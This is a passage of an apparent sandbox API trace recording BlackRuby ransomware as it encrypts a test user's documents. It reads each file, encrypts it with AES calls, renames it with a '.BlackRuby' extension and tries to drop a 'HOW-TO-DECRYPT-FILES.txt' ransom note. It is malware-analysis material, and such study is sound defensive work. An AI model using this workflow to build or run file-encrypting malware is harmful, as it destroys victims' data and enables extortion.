GetLastError () returned 0x0 [0058.036] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c136d4*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c136d4*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0058.036] GetLastError () returned 0x0 [0058.036] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c13704*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c13704*, pdwDataLen=0x18ed94*=0x10) returned 1 [0058.036] GetLastError () returned 0x0 [0058.039] CryptDestroyKey (hKey=0x360b20) returned 1 [0058.039] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.039] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.039] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\T8ZG2Rs5xdoe5xvTLx.docx", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\T8ZG2Rs5xdoe5xvTLx.docx", lpFilePart=0x0) returned 0x32 [0058.039] GetLastError () returned 0x0 [0058.039] SetErrorMode (uMode=0x1) returned 0x0 [0058.039] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\T8ZG2Rs5xdoe5xvTLx.docx" (normalized: "c:\\users\\eebsym5\\documents\\t8zg2rs5xdoe5xvtlx.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.040] GetLastError () returned 0xb7 [0058.040] GetFileType (hFile=0x184) returned 0x1 [0058.040] SetErrorMode (uMode=0x0) returned 0x1 [0058.040] GetFileType (hFile=0x184) returned 0x1 [0058.042] CloseHandle (hObject=0x184) returned 1 [0058.043] GetLastError () returned 0xb7 [0058.043] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\T8ZG2Rs5xdoe5xvTLx.docx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\T8ZG2Rs5xdoe5xvTLx.docx", lpFilePart=0x0) returned 0x32 [0058.043] GetLastError () returned 0xb7 [0058.043] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_nvZUXofQoO8L4ShptL88Rrs8WHWMa3BHANnJG.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Encrypted_nvZUXofQoO8L4ShptL88Rrs8WHWMa3BHANnJG.BlackRuby", lpFilePart=0x0) returned 0x54 [0058.043] GetLastError () returned 0xb7 [0058.043] SetErrorMode (uMode=0x1) returned 0x0 [0058.043] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\T8ZG2Rs5xdoe5xvTLx.docx" (normalized: "c:\\users\\eebsym5\\documents\\t8zg2rs5xdoe5xvtlx.docx"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5323fa10, ftCreationTime.dwHighDateTime=0x1d3952d, ftLastAccessTime.dwLowDateTime=0x43f444d0, ftLastAccessTime.dwHighDateTime=0x1d37248, ftLastWriteTime.dwLowDateTime=0x2aca2c60, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x18120)) returned 1 [0058.043] GetLastError () returned 0xb7 [0058.043] SetErrorMode (uMode=0x0) returned 0x1 [0058.043] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\T8ZG2Rs5xdoe5xvTLx.docx" (normalized: "c:\\users\\eebsym5\\documents\\t8zg2rs5xdoe5xvtlx.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_nvZUXofQoO8L4ShptL88Rrs8WHWMa3BHANnJG.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\encrypted_nvzuxofqoo8l4shptl88rrs8whwma3bhannjg.blackruby")) returned 1 [0058.043] GetLastError () returned 0xb7 [0058.044] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0058.044] GetLastError () returned 0xb7 [0058.044] SetErrorMode (uMode=0x1) returned 0x0 [0058.044] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0058.044] GetLastError () returned 0x5 [0058.045] SetErrorMode (uMode=0x0) returned 0x1 [0058.045] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\wo-gXTV3.pptx", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\wo-gXTV3.pptx", lpFilePart=0x0) returned 0x28 [0058.045] GetLastError () returned 0x5 [0058.045] SetErrorMode (uMode=0x1) returned 0x0 [0058.045] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\wo-gXTV3.pptx" (normalized: "c:\\users\\eebsym5\\documents\\wo-gxtv3.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1c3083c | out: lpFileInformation=0x1c3083c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8ad24a0, ftCreationTime.dwHighDateTime=0x1d3302b, ftLastAccessTime.dwLowDateTime=0x8d6387b0, ftLastAccessTime.dwHighDateTime=0x1d36c9a, ftLastWriteTime.dwLowDateTime=0x8d6387b0, ftLastWriteTime.dwHighDateTime=0x1d36c9a, nFileSizeHigh=0x0, nFileSizeLow=0xefd2)) returned 1 [0058.045] GetLastError () returned 0x5 [0058.045] SetErrorMode (uMode=0x0) returned 0x1 [0058.045] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\wo-gXTV3.pptx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\wo-gXTV3.pptx", lpFilePart=0x0) returned 0x28 [0058.045] GetLastError () returned 0x5 [0058.045] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\wo-gXTV3.pptx", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\wo-gXTV3.pptx", lpFilePart=0x0) returned 0x28 [0058.045] GetLastError () returned 0x5 [0058.046] SetErrorMode (uMode=0x1) returned 0x0 [0058.046] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\wo-gXTV3.pptx" (normalized: "c:\\users\\eebsym5\\documents\\wo-gxtv3.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.046] GetLastError () returned 0x0 [0058.046] GetFileType (hFile=0x184) returned 0x1 [0058.046] SetErrorMode (uMode=0x0) returned 0x1 [0058.046] GetFileType (hFile=0x184) returned 0x1 [0058.046] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0xefd2 [0058.046] GetLastError () returned 0x0 [0058.046] ReadFile (in: hFile=0x184, lpBuffer=0x1c32578, nNumberOfBytesToRead=0xefd2, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c32578*, lpNumberOfBytesRead=0x18ed84*=0xefd2, lpOverlapped=0x0) returned 1 [0058.047] GetLastError () returned 0x0 [0058.047] CloseHandle (hObject=0x184) returned 1 [0058.047] GetLastError () returned 0x0 [0058.047] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\wo-gXTV3.pptx", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\wo-gXTV3.pptx", lpFilePart=0x0) returned 0x28 [0058.047] GetLastError () returned 0x0 [0058.047] SetErrorMode (uMode=0x1) returned 0x0 [0058.047] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\wo-gXTV3.pptx" (normalized: "c:\\users\\eebsym5\\documents\\wo-gxtv3.pptx"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8ad24a0, ftCreationTime.dwHighDateTime=0x1d3302b, ftLastAccessTime.dwLowDateTime=0x8d6387b0, ftLastAccessTime.dwHighDateTime=0x1d36c9a, ftLastWriteTime.dwLowDateTime=0x8d6387b0, ftLastWriteTime.dwHighDateTime=0x1d36c9a, nFileSizeHigh=0x0, nFileSizeLow=0xefd2)) returned 1 [0058.047] GetLastError () returned 0x0 [0058.047] SetErrorMode (uMode=0x0) returned 0x1 [0058.059] CryptImportKey (in: hProv=0x37c790, pbData=0x1caa8c4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x3609e0) returned 1 [0058.059] GetLastError () returned 0x0 [0058.060] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.060] GetLastError () returned 0x0 [0058.066] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.066] GetLastError () returned 0x0 [0058.066] CryptDuplicateKey (in: hKey=0x3609e0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360fa0) returned 1 [0058.066] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.066] GetLastError () returned 0x0 [0058.066] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1cd7910*=0x1, dwFlags=0x0) returned 1 [0058.067] GetLastError () returned 0x0 [0058.067] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1cd78dc, dwFlags=0x0) returned 1 [0058.067] GetLastError () returned 0x0 [0058.067] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cd7958*, pdwDataLen=0x18ed74*=0xf0d0, dwBufLen=0xf0d0 | out: pbData=0x1cd7958*, pdwDataLen=0x18ed74*=0xf0d0) returned 1 [0058.067] GetLastError () returned 0x0 [0058.067] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cf5b24*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cf5b24*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0058.067] GetLastError () returned 0x0 [0058.067] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cf5b54*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cf5b54*, pdwDataLen=0x18ed94*=0x10) returned 1 [0058.067] GetLastError () returned 0x0 [0058.069] CryptDestroyKey (hKey=0x3609e0) returned 1 [0058.069] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.069] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.069] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\wo-gXTV3.pptx", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\wo-gXTV3.pptx", lpFilePart=0x0) returned 0x28 [0058.069] GetLastError () returned 0x0 [0058.069] SetErrorMode (uMode=0x1) returned 0x0 [0058.070] GetFileType (hFile=0x184) returned 0x1 [0058.070] SetErrorMode (uMode=0x0) returned 0x1 [0058.070] GetFileType (hFile=0x184) returned 0x1 [0058.070] WriteFile (in: hFile=0x184, lpBuffer=0x1cf5b84*, nNumberOfBytesToWrite=0xf0e0, lpNumberOfBytesWritten=0x18ed90, lpOverlapped=0x0 | out: lpBuffer=0x1cf5b84*, lpNumberOfBytesWritten=0x18ed90*=0xf0e0, lpOverlapped=0x0) returned 1 [0058.072] GetLastError () returned 0xb7 [0058.072] CloseHandle (hObject=0x184) returned 1 [0058.078] GetLastError () returned 0xb7 [0058.078] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\wo-gXTV3.pptx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\wo-gXTV3.pptx", lpFilePart=0x0) returned 0x28 [0058.078] GetLastError () returned 0xb7 [0058.078] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_zGoUjam7f5XxIrQtK28MeLXCOawUWvVDi2UfW3t0Tg.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Encrypted_zGoUjam7f5XxIrQtK28MeLXCOawUWvVDi2UfW3t0Tg.BlackRuby", lpFilePart=0x0) returned 0x59 [0058.078] GetLastError () returned 0xb7 [0058.079] SetErrorMode (uMode=0x1) returned 0x0 [0058.079] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\wo-gXTV3.pptx" (normalized: "c:\\users\\eebsym5\\documents\\wo-gxtv3.pptx"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8ad24a0, ftCreationTime.dwHighDateTime=0x1d3302b, ftLastAccessTime.dwLowDateTime=0x8d6387b0, ftLastAccessTime.dwHighDateTime=0x1d36c9a, ftLastWriteTime.dwLowDateTime=0x2aceef20, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xf0e0)) returned 1 [0058.079] GetLastError () returned 0xb7 [0058.079] SetErrorMode (uMode=0x0) returned 0x1 [0058.079] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\wo-gXTV3.pptx" (normalized: "c:\\users\\eebsym5\\documents\\wo-gxtv3.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_zGoUjam7f5XxIrQtK28MeLXCOawUWvVDi2UfW3t0Tg.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\encrypted_zgoujam7f5xxirqtk28melxcoawuwvvdi2ufw3t0tg.blackruby")) returned 1 [0058.094] GetLastError () returned 0xb7 [0058.095] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0058.095] GetLastError () returned 0xb7 [0058.095] SetErrorMode (uMode=0x1) returned 0x0 [0058.095] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0058.095] GetLastError () returned 0x5 [0058.096] SetErrorMode (uMode=0x0) returned 0x1 [0058.097] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\wyLUPSt76sM.xlsx", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\wyLUPSt76sM.xlsx", lpFilePart=0x0) returned 0x2b [0058.097] GetLastError () returned 0x5 [0058.097] SetErrorMode (uMode=0x1) returned 0x0 [0058.097] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\wyLUPSt76sM.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\wylupst76sm.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1d21d38 | out: lpFileInformation=0x1d21d38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x668cb100, ftCreationTime.dwHighDateTime=0x1d3517b, ftLastAccessTime.dwLowDateTime=0xcc6e4810, ftLastAccessTime.dwHighDateTime=0x1d332e7, ftLastWriteTime.dwLowDateTime=0xcc6e4810, ftLastWriteTime.dwHighDateTime=0x1d332e7, nFileSizeHigh=0x0, nFileSizeLow=0x150c4)) returned 1 [0058.097] GetLastError () returned 0x5 [0058.097] SetErrorMode (uMode=0x0) returned 0x1 [0058.098] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\wyLUPSt76sM.xlsx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\wyLUPSt76sM.xlsx", lpFilePart=0x0) returned 0x2b [0058.098] GetLastError () returned 0x5 [0058.098] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\wyLUPSt76sM.xlsx", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\wyLUPSt76sM.xlsx", lpFilePart=0x0) returned 0x2b [0058.098] GetLastError () returned 0x5 [0058.098] SetErrorMode (uMode=0x1) returned 0x0 [0058.098] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\wyLUPSt76sM.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\wylupst76sm.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.098] GetLastError () returned 0x0 [0058.098] GetFileType (hFile=0x184) returned 0x1 [0058.098] SetErrorMode (uMode=0x0) returned 0x1 [0058.098] GetFileType (hFile=0x184) returned 0x1 [0058.098] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x150c4 [0058.098] GetLastError () returned 0x0 [0058.099] ReadFile (in: hFile=0x184, lpBuffer=0x2dc4ca0, nNumberOfBytesToRead=0x150c4, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x2dc4ca0*, lpNumberOfBytesRead=0x18ed84*=0x150c4, lpOverlapped=0x0) returned 1 [0058.100] GetLastError () returned 0x0 [0058.100] CloseHandle (hObject=0x184) returned 1 [0058.100] GetLastError () returned 0x0 [0058.101] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\wyLUPSt76sM.xlsx", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\wyLUPSt76sM.xlsx", lpFilePart=0x0) returned 0x2b [0058.101] GetLastError () returned 0x0 [0058.101] SetErrorMode (uMode=0x1) returned 0x0 [0058.101] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\wyLUPSt76sM.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\wylupst76sm.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x668cb100, ftCreationTime.dwHighDateTime=0x1d3517b, ftLastAccessTime.dwLowDateTime=0xcc6e4810, ftLastAccessTime.dwHighDateTime=0x1d332e7, ftLastWriteTime.dwLowDateTime=0xcc6e4810, ftLastWriteTime.dwHighDateTime=0x1d332e7, nFileSizeHigh=0x0, nFileSizeLow=0x150c4)) returned 1 [0058.101] GetLastError () returned 0x0 [0058.101] SetErrorMode (uMode=0x0) returned 0x1 [0058.101] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0058.102] GetLastError () returned 0x0 [0058.139] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1b6e3b8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ae0) returned 1 [0058.139] GetLastError () returned 0x0 [0058.139] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.139] GetLastError () returned 0x0 [0058.144] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.144] GetLastError () returned 0x0 [0058.144] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360e20) returned 1 [0058.144] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.144] GetLastError () returned 0x0 [0058.144] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1b9b404*=0x1, dwFlags=0x0) returned 1 [0058.144] GetLastError () returned 0x0 [0058.144] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1b9b3d0, dwFlags=0x0) returned 1 [0058.144] GetLastError () returned 0x0 [0058.145] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2deef60*, pdwDataLen=0x18ed74*=0x151c0, dwBufLen=0x151c0 | out: pbData=0x2deef60*, pdwDataLen=0x18ed74*=0x151c0) returned 1 [0058.146] GetLastError () returned 0x0 [0058.147] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b9b460*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b9b460*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0058.147] GetLastError () returned 0x0 [0058.147] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b9b490*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b9b490*, pdwDataLen=0x18ed94*=0x10) returned 1 [0058.147] GetLastError () returned 0x0 [0058.157] CryptDestroyKey (hKey=0x360ae0) returned 1 [0058.157] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0058.157] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0058.157] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\wyLUPSt76sM.xlsx", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\wyLUPSt76sM.xlsx", lpFilePart=0x0) returned 0x2b [0058.157] GetLastError () returned 0x0 [0058.157] SetErrorMode (uMode=0x1) returned 0x0 [0058.157] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\wyLUPSt76sM.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\wylupst76sm.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.159] GetLastError () returned 0xb7 [0058.159] GetFileType (hFile=0x184) returned 0x1 [0058.159] SetErrorMode (uMode=0x0) returned 0x1 [0058.159] GetFileType (hFile=0x184) returned 0x1 [0058.161] CloseHandle (hObject=0x184) returned 1 [0058.161] GetLastError () returned 0xb7 [0058.161] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\wyLUPSt76sM.xlsx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\wyLUPSt76sM.xlsx", lpFilePart=0x0) returned 0x2b [0058.161] GetLastError () returned 0xb7 [0058.161] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_m8qhneMu1hEHkkldTIKbBHxoc14SNGt8tQWb.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Encrypted_m8qhneMu1hEHkkldTIKbBHxoc14SNGt8tQWb.BlackRuby", lpFilePart=0x0) returned 0x53 [0058.161] GetLastError () returned 0xb7 [0058.161] SetErrorMode (uMode=0x1) returned 0x0 [0058.161] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\wyLUPSt76sM.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\wylupst76sm.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x668cb100, ftCreationTime.dwHighDateTime=0x1d3517b, ftLastAccessTime.dwLowDateTime=0xcc6e4810, ftLastAccessTime.dwHighDateTime=0x1d332e7, ftLastWriteTime.dwLowDateTime=0x2add3760, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x151d0)) returned 1 [0058.161] GetLastError () returned 0xb7 [0058.161] SetErrorMode (uMode=0x0) returned 0x1 [0058.161] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\wyLUPSt76sM.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\wylupst76sm.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_m8qhneMu1hEHkkldTIKbBHxoc14SNGt8tQWb.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\encrypted_m8qhnemu1hehkkldtikbbhxoc14sngt8tqwb.blackruby")) returned 1 [0058.161] GetLastError () returned 0xb7 [0058.162] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0058.162] GetLastError () returned 0xb7 [0058.162] SetErrorMode (uMode=0x1) returned 0x0 [0058.162] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0058.162] GetLastError () returned 0x5 [0058.163] SetErrorMode (uMode=0x0) returned 0x1 [0058.164] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\xg_vG78DSGvcqj KCI.docx", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\xg_vG78DSGvcqj KCI.docx", lpFilePart=0x0) returned 0x32 [0058.164] GetLastError () returned 0x5 [0058.164] SetErrorMode (uMode=0x1) returned 0x0 [0058.164] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\xg_vG78DSGvcqj KCI.docx" (normalized: "c:\\users\\eebsym5\\documents\\xg_vg78dsgvcqj kci.docx"), fInfoLevelId=0x0, lpFileInformation=0x1b3ff24 | out: lpFileInformation=0x1b3ff24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4655cb0, ftCreationTime.dwHighDateTime=0x1d33481, ftLastAccessTime.dwLowDateTime=0xc65b8df0, ftLastAccessTime.dwHighDateTime=0x1d39d5b, ftLastWriteTime.dwLowDateTime=0xc65b8df0, ftLastWriteTime.dwHighDateTime=0x1d39d5b, nFileSizeHigh=0x0, nFileSizeLow=0x13c4c)) returned 1 [0058.164] GetLastError () returned 0x5 [0058.164] SetErrorMode (uMode=0x0) returned 0x1 [0058.164] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\xg_vG78DSGvcqj KCI.docx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\xg_vG78DSGvcqj KCI.docx", lpFilePart=0x0) returned 0x32 [0058.164] GetLastError () returned 0x5 [0058.164] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\xg_vG78DSGvcqj KCI.docx", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\xg_vG78DSGvcqj KCI.docx", lpFilePart=0x0) returned 0x32 [0058.164] GetLastError () returned 0x5 [0058.164] SetErrorMode (uMode=0x1) returned 0x0 [0058.164] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\xg_vG78DSGvcqj KCI.docx" (normalized: 